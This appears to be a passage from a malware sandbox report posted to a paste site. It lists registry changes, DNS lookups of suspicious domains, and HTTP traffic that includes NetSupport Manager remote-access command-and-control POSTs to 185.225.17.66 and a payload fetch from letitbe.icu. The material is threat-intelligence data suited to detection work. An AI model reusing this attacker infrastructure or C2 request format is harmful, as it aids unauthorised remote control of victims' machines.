- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\1C9308F0-8A41-4006-B814-D2F5B13BEDB5\\data"
- * Deleted Registry Keys:
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\OverrideProtocol_Object",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\updsvc.job",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\updsvc.job.fp"
- * DNS Communications:
- "type": "A",
- "request": "gidjshrvz.xyz",
- "answers":
- "data": "",
- "type": "NXDOMAIN"
- "type": "A",
- "request": "pofasfafha.xyz",
- "answers":
- "data": "185.225.17.169",
- "type": "A"
- "type": "A",
- "request": "apps.identrust.com",
- "answers":
- "data": "192.35.177.64",
- "type": "A"
- "data": "apps.digsigtrust.com",
- "type": "CNAME"
- "type": "A",
- "request": "fdguyt5ggs.pw",
- "answers":
- "data": "",
- "type": "NXDOMAIN"
- "type": "A",
- "request": "letitbe.icu",
- "answers":
- "data": "185.225.17.169",
- "type": "A"
- "type": "A",
- "request": "geo.netsupportsoftware.com",
- "answers":
- "data": "62.172.138.35",
- "type": "A"
- "data": "geograph.netsupportsoftware.com",
- "type": "CNAME"
- "data": "195.171.92.116",
- "type": "A"
- * Domains:
- "ip": "",
- "domain": "fdguyt5ggs.pw"
- "ip": "185.225.17.169",
- "domain": "pofasfafha.xyz"
- "ip": "192.35.177.64",
- "domain": "apps.identrust.com"
- "ip": "",
- "domain": "gidjshrvz.xyz"
- "ip": "62.172.138.35",
- "domain": "geo.netsupportsoftware.com"
- "ip": "185.225.17.169",
- "domain": "letitbe.icu"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "",
- "uri": "http://apps.identrust.com/roots/dstrootcax3.p7c",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "apps.identrust.com",
- "version": "1.1",
- "path": "/roots/dstrootcax3.p7c",
- "data": "GET /roots/dstrootcax3.p7c HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: apps.identrust.com\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "www.download.windowsupdate.com",
- "version": "1.1",
- "path": "/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
- "data": "GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1\r\nCache-Control: max-age = 89965\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: www.download.windowsupdate.com\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://letitbe.icu/2.txt",
- "user-agent": "Embarcadero URI Client/1.0",
- "method": "GET",
- "host": "letitbe.icu",
- "version": "1.1",
- "path": "/2.txt",
- "data": "GET /2.txt HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: Embarcadero URI Client/1.0\r\nHost: letitbe.icu\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "CMD=POLL\nINFO=1\nACK=1\n",
- "uri": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm",
- "user-agent": "NetSupport Manager/1.3",
- "method": "POST",
- "host": "185.225.17.66",
- "version": "1.1",
- "path": "http://185.225.17.66/fakeurl.htm",
- "data": "POST http://185.225.17.66/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 22\nHost: 185.225.17.66\nConnection: Keep-Alive\n\nCMD=POLL\nINFO=1\nACK=1\n",
- "port": 443
- "count": 1,
- "body": "CMD=ENCD\nES=1\nDATA=u\\xfe2h\\x0cr\\xef\\x024\\xd7\\xa7\\xb1%y-\\xa9\\x85\\xaf\\xcf\\xdc=I\\xad\\x88\\xdeD3\\xbcW\\x8e\\x8ai\\xe97?\\xbf\\x03\\xae\\xc8=@\\xfd\\xec\\xc7\\xc1F\\xe5f\\xd5\\xaa\\x9b\\xe8&t\\xc8\\x05\\xc86ra\\x06\\xfeL\\xe0A\\xf2j\\xda\\xf3\\x1a\\x880\\x9c\\xdc=\\xe29\\x04CE\\x84\\x07-\\xa7U\\xf1\\x8d(\\xb4\\xc4\\x944Z\\x92:\\x9f\\xac\\xd2K\\xccG\\xc5\\xb0\\xf6\\x8f\\xe1P\\x99\\xdb\\xbd\\xe0\\xec\\xcf\\xb5\\\\xf9b\\xf2\\x04\\xf4><\\xc9\\x0b\\xec\\x9c\\xdc=\\xe29\\x04CE\\xa8\\xa3\\x93\\xd2\\xd3\\xe6\\xc0\\x13\\x89\\xa3(\\xf1 \\xca4\\xfd\\xe4\\x83\\xcc\\xa9\\xcb\\xa8 \\x1d\\x9c\\x01-\\x8amc\\x97\\xc1\\x10K\\xcb)\\xf2\\x17\\x97\\x08\\xe66\\x85\\x0f\\xfa)\\xff\\x819\\x0f<\\xcf\\x01\\xea\\xa4\\xbe\\xf6\\xd6\\xeeW\\x18\\xc4t\\xbf_\\xb0\\xd5Az\n",
- "uri": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm",
- "user-agent": "NetSupport Manager/1.3",
- "method": "POST",
- "host": "185.225.17.66",
- "version": "1.1",
- "path": "http://185.225.17.66/fakeurl.htm",
- "data": "POST http://185.225.17.66/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 232\nHost: 185.225.17.66\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=u\\xfe2h\\x0cr\\xef\\x024\\xd7\\xa7\\xb1%y-\\xa9\\x85\\xaf\\xcf\\xdc=I\\xad\\x88\\xdeD3\\xbcW\\x8e\\x8ai\\xe97?\\xbf\\x03\\xae\\xc8=@\\xfd\\xec\\xc7\\xc1F\\xe5f\\xd5\\xaa\\x9b\\xe8&t\\xc8\\x05\\xc86ra\\x06\\xfeL\\xe0A\\xf2j\\xda\\xf3\\x1a\\x880\\x9c\\xdc=\\xe29\\x04CE\\x84\\x07-\\xa7U\\xf1\\x8d(\\xb4\\xc4\\x944Z\\x92:\\x9f\\xac\\xd2K\\xccG\\xc5\\xb0\\xf6\\x8f\\xe1P\\x99\\xdb\\xbd\\xe0\\xec\\xcf\\xb5\\\\xf9b\\xf2\\x04\\xf4><\\xc9\\x0b\\xec\\x9c\\xdc=\\xe29\\x04CE\\xa8\\xa3\\x93\\xd2\\xd3\\xe6\\xc0\\x13\\x89\\xa3(\\xf1 \\xca4\\xfd\\xe4\\x83\\xcc\\xa9\\xcb\\xa8 \\x1d\\x9c\\x01-\\x8amc\\x97\\xc1\\x10K\\xcb)\\xf2\\x17\\x97\\x08\\xe66\\x85\\x0f\\xfa)\\xff\\x819\\x0f<\\xcf\\x01\\xea\\xa4\\xbe\\xf6\\xd6\\xeeW\\x18\\xc4t\\xbf_\\xb0\\xd5Az\n",
- "port": 443
- "count": 1,
- "body": "",
- "uri": "http://geo.netsupportsoftware.com/location/loca.asp",
- "user-agent": "",
- "method": "GET",
- "host": "geo.netsupportsoftware.com",
- "version": "1.1",
- "path": "/location/loca.asp",
- "data": "GET /location/loca.asp HTTP/1.1\r\nHost: geo.netsupportsoftware.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "CMD=ENCD\nES=1\nDATA=l3\\x1d<(T\\x1aE\\x98\\xf8\\xfb\\x14\\xb9V\\x1a\\x1c\\x9a\\xf3k\\xee9|||$(m\\xf2\\xdb$C(^\\xf5 \\xb2\\xd5\\x85\\x03=M\\xb10Y\\x8f=\\xa36\\xce\\xcb\\x9b\\x84\\x98\\x16\\xfd\\xc9\n",
- "uri": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm",
- "user-agent": "NetSupport Manager/1.3",
- "method": "POST",
- "host": "185.225.17.66",
- "version": "1.1",
- "path": "http://185.225.17.66/fakeurl.htm",
- "data": "POST http://185.225.17.66/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 78\nHost: 185.225.17.66\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=l3\\x1d<(T\\x1aE\\x98\\xf8\\xfb\\x14\\xb9V\\x1a\\x1c\\x9a\\xf3k\\xee9|||$(m\\xf2\\xdb$C(^\\xf5 \\xb2\\xd5\\x85\\x03=M\\xb10Y\\x8f=\\xa36\\xce\\xcb\\x9b\\x84\\x98\\x16\\xfd\\xc9\n",
- "port": 443
- "count": 4,
- "body": "CMD=ENCD\nES=1\nDATA=\\x93\\xe8#\\x0e\\xedmH\\xee\\xe5UAA\\xb6\\x89g\\xf8\n",
- "uri": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm",
- "user-agent": "NetSupport Manager/1.3",
- "method": "POST",
- "host": "185.225.17.66",
- "version": "1.1",
- "path": "http://185.225.17.66/fakeurl.htm",
- "data": "POST http://185.225.17.66/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 36\nHost: 185.225.17.66\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=\\x93\\xe8#\\x0e\\xedmH\\xee\\xe5UAA\\xb6\\x89g\\xf8\n",
- "port": 443
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Add Comment
Please, Sign In to add comment